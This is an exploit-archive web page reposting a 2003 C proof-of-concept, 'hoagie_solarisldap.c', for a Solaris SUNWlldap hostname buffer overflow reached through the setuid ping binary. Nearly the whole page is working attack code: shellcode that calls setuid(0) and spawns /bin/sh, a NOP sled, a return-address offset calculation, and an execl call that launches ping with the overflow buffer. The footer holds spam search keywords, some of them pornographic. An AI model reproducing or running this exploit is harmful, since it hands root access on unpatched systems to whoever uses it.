about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Sun SUNWlldap Library Hostname Remote Buffer Overflow Exploit




2003-04-01 Sun SUNWlldap Library Hostname Remote Buffer Overflow Exploit 
/*********************************************************** 
* hoagie_solarisldap.c
*
* gcc hoagie_solarisldap.c -o hoagie_solarisldap
*
* Author: Andi <andi@void.at>
*
* Greetz to Greuff, philipp and the other hoagie-fellas :-)
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
*
* Offsets: 9208 ... without patch 108994-11
*
************************************************************/

#include <stdio.h>

#define NOP 0x90
#define ORIGSIZE 258

char shellcode[]=
/* main: */
"\xeb\x0a" /* jmp initcall */

/* initlcall: */
"\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */
"\xc3" /* ret */

/* jmpz: */
"\xeb\x05" /* jmp setuidcode */

/* initcall: */
"\xe8\xf9\xff\xff\xff" /* call jmpz */

/* setuidcode: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */

/* seteuid(0); */
"\x50" /* pushl %eax */
"\xb0\x8d" /* movb $0x8d, %al */
"\xe8\xe0\xff\xff\xff" /* call initlcall */
/* setuid(0); */
"\x29\xc0" /* subl %eax, %eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xe8\xd6\xff\xff\xff" /* call initlcall */

"\xeb\x1f" /* jmp callz */

/* start: */
/* execve /bin/sh */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi), %ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi) */
"\x89\x46\x14" /* movl %eax, 0x14(%esi) */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
"\x89\x46\x07" /* movl %eax, 0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x51" /* pushl %ecx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */

/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start */

"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"

/* lcall: */
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */



unsigned long getsp(void)
{
__asm__(" movl %esp,%eax ");
}

int main(int argc, char **argv) {
char buf[512];
int offset = 9208;
int retaddr = 0;
int i;

if (argc > 1) {
sscanf(argv[1], "%d", &offset);
}

printf("hoagie_solarisldap local root exploit\n");
printf("[*] offset: 0x%x\n", offset);

memset(buf, NOP, sizeof(buf));
buf[28] = 0xeb;
buf[29] = 30;
for (i = 0; i < strlen(shellcode); i++) {
buf[i + 60] = shellcode[i];
}

retaddr = getsp() - offset;
printf("[*] return address: 0x%x\n", retaddr);

for (i = 0; i < 4 * 25; i += 4){
buf[i + ORIGSIZE + 2] = retaddr & 0xff;
buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff;
buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff;
buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff;
}

execl("/usr/sbin/ping", "ping", buf, NULL);
}


securitydot.net - 2003-04-01

Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 03:37:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Own3d zhihui99.a Www.kareen nph-test-c Lesbien se www.Pooja php-nuke 2 Grilssex card.y6608 www.hntkjq lo421l i want se os X INDIANSEX4 Sex Abg vi www.youtuo www.scl001 sexyr shell vuln php-nuke 2 www.gjszy. /search/ex www.scl001 news for \ w w w.za3r Rani mukhe www.zhsww. Exploits+j bisex /search/ex phproxy 0. mindorosex www.inteke www.zhsww. WWW.XXL.KO sasl t458t XNXX LIMEWIRE porno.3gp. lo304l uiq cqjiaz.com Sex Imege www.baihua MFC www.sexiwo www.kankan invision S www.you tu